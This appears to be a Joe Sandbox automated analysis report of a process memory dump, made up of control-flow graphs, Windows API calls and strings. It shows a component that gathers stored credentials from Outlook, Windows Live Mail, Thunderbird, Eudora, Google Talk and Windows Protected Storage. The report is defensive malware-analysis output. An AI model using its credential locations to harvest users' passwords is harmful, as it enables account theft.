                                                  • memset.MSVCRT ref: 00408343
                                                  • memset.MSVCRT ref: 0040835F
                                                  • memset.MSVCRT ref: 00408376
                                                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                  • strlen.MSVCRT ref: 004083E9
                                                  • strlen.MSVCRT ref: 004083F8
                                                  • memcpy.MSVCRT ref: 0040840A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                  • String ID: 5$H$O$b$i$}$}

                                                  Control-flow Graph

                                                  control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                  • strlen.MSVCRT ref: 00407F5C
                                                  • strlen.MSVCRT ref: 00407F64
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileFindstrlen$FirstNext
                                                  • String ID: ACD

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 00401E8B
                                                  • strlen.MSVCRT ref: 00401EA4
                                                  • strlen.MSVCRT ref: 00401EB2
                                                  • strlen.MSVCRT ref: 00401EF8
                                                  • strlen.MSVCRT ref: 00401F06
                                                  • memset.MSVCRT ref: 00401FB1
                                                  • atoi.MSVCRT ref: 00401FE0
                                                  • memset.MSVCRT ref: 00402003
                                                  • sprintf.MSVCRT ref: 00402030
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • memset.MSVCRT ref: 00402086
                                                  • memset.MSVCRT ref: 0040209B
                                                  • strlen.MSVCRT ref: 004020A1
                                                  • strlen.MSVCRT ref: 004020AF
                                                  • strlen.MSVCRT ref: 004020E2
                                                  • strlen.MSVCRT ref: 004020F0
                                                  • memset.MSVCRT ref: 00402018
                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                  • _mbscpy.MSVCRT ref: 00402177
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                                                  • DeleteObject.GDI32(?), ref: 0040D1A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                  • _mbscpy.MSVCRT ref: 00403E54
                                                  Strings
                                                  • pstorec.dll, xrefs: 00403C30
                                                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                  • PStoreCreateInstance, xrefs: 00403C44
                                                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc_mbscpy
                                                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account

                                                  Control-flow Graph

                                                  control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • memcpy.MSVCRT ref: 0040FBE4
                                                  • memcpy.MSVCRT ref: 0040FBF9
                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE

                                                  Control-flow Graph

                                                  control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 254 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->254 253->252 255 444c75-444c7e 253->255 264 444d02-444d0d __setusermatherr 254->264 265 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 254->265 256 444c80-444c85 255->256 257 444c9f-444ca3 255->257 256->252 259 444c8c-444c93 256->259 257->252 260 444ca5-444ca7 257->260 259->252 262 444c95-444c9d 259->262 263 444cad-444cb0 260->263 262->263 263->254 264->265 268 444da4-444da7 265->268 269 444d6a-444d72 265->269 270 444d81-444d85 268->270 271 444da9-444dad 268->271 272 444d74-444d76 269->272 273 444d78-444d7b 269->273 275 444d87-444d89 270->275 276 444d8b-444d9c GetStartupInfoA 270->276 271->268 272->269 272->273 273->270 274 444d7d-444d7e 273->274 274->270 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                  • String ID:

                                                  Control-flow Graph

                                                  APIs
                                                  • memset.MSVCRT ref: 0044430B
                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                                                  • memset.MSVCRT ref: 00444379
                                                  • memset.MSVCRT ref: 00444394
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                  • strlen.MSVCRT ref: 004443DB
                                                  • _strcmpi.MSVCRT ref: 00444401
                                                  Strings
                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                  • Store Root, xrefs: 004443A5
                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail

                                                  Control-flow Graph

                                                  control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                  APIs
                                                  • memset.MSVCRT ref: 0040F567
                                                  • memset.MSVCRT ref: 0040F57F
                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • memcpy.MSVCRT ref: 0040F652
                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                  • String ID:

                                                  Control-flow Graph

                                                  control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                  APIs
                                                  • memset.MSVCRT ref: 004037EB
                                                  • memset.MSVCRT ref: 004037FF
                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                  • strchr.MSVCRT ref: 0040386E
                                                  • _mbscpy.MSVCRT ref: 0040388B
                                                  • strlen.MSVCRT ref: 00403897
                                                  • sprintf.MSVCRT ref: 004038B7
                                                  • _mbscpy.MSVCRT ref: 004038CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                  • String ID: %s@yahoo.com

                                                  Control-flow Graph

                                                  control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 361 404af5-404afa 356->361 362 404adb 357->362 358->356 359 404ae8-404aea 358->359 359->361 363 404b13-404b17 361->363 364 404afc-404b12 MessageBoxA 361->364 362->358
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                  • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadMessageProc
                                                  • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll

                                                  Control-flow Graph

                                                  control_flow_graph 365 4034e4-403544 memset * 2 call 410b1e 368 403580-403582 365->368 369 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 365->369 369->368
                                                  APIs
                                                  • memset.MSVCRT ref: 00403504
                                                  • memset.MSVCRT ref: 0040351A
                                                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                  • _mbscpy.MSVCRT ref: 00403555
                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                  • _mbscat.MSVCRT ref: 0040356D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                  • String ID: InstallPath$Software\Group Mail$fb.dat

                                                  Control-flow Graph

                                                  control_flow_graph 374 40ccd7-40cd06 ??2@YAPAXI@Z 375 40cd08-40cd0d 374->375 376 40cd0f 374->376 377 40cd11-40cd24 ??2@YAPAXI@Z 375->377 376->377 378 40cd26-40cd2d call 404025 377->378 379 40cd2f 377->379 381 40cd31-40cd57 378->381 379->381 382 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 381->382 383 40cd59-40cd60 DeleteObject 381->383 383->382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                  • String ID:

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  • memset.MSVCRT ref: 00408620
                                                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                  • memset.MSVCRT ref: 00408671
                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                  Strings
                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                  • String ID: Software\Google\Google Talk\Accounts

                                                  Control-flow Graph

                                                  control_flow_graph 414 40ba28-40ba3a 415 40ba87-40ba9b call 406c62 414->415 416 40ba3c-40ba52 call 407e20 _mbsicmp 414->416 438 40ba9d call 4107f1 415->438 439 40ba9d call 404734 415->439 440 40ba9d call 404785 415->440 441 40ba9d call 403c16 415->441 442 40ba9d call 410a9c 415->442 421 40ba54-40ba6d call 407e20 416->421 422 40ba7b-40ba85 416->422 428 40ba74 421->428 429 40ba6f-40ba72 421->429 422->415 422->416 423 40baa0-40bab3 call 407e30 430 40bab5-40bac1 423->430 431 40bafa-40bb09 SetCursor 423->431 432 40ba75-40ba76 call 40b5e5 428->432 429->432 433 40bac3-40bace 430->433 434 40bad8-40baf7 qsort 430->434 432->422 433->434 434->431 438->423 439->423 440->423 441->423 442->423
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Cursor_mbsicmpqsort
                                                  • String ID: /nosort$/sort
                                                  APIs
                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                  • memset.MSVCRT ref: 00410E10
                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                  • _mbscpy.MSVCRT ref: 00410E87
                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                  Strings
                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                  Memory Dump Source
                                                  • Source File: 0000000D.00000002.216326038804.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                  • API String ID: 889583718-2036018995
                                                  APIs
                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                  Similarity
                                                  • API ID: Resource$FindLoadLockSizeof
                                                  • String ID:
                                                  • API String ID: 3473537107-0
                                                  APIs
                                                  • memset.MSVCRT ref: 004109F7
                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                    • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                  • memset.MSVCRT ref: 00410A32
                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                  • String ID:
                                                  • API String ID: 3143880245-0
                                                  APIs
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  APIs
                                                  Similarity
                                                  • API ID: ??3@mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3831604043-0
                                                  APIs
                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                  Strings
                                                  Similarity
                                                  • API ID: CreateFontIndirect_mbscpymemset
                                                  • String ID: Arial
                                                  • API String ID: 3853255127-493054409
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                  Strings
                                                  Similarity
                                                  • API ID: strlen$_strcmpimemset
                                                  • String ID: /stext
                                                  • API String ID: 520177685-3817206916
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 145871493-0
                                                  APIs
                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                  • String ID:
                                                  • API String ID: 4165544737-0
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  APIs
                                                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  APIs
                                                  • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  APIs
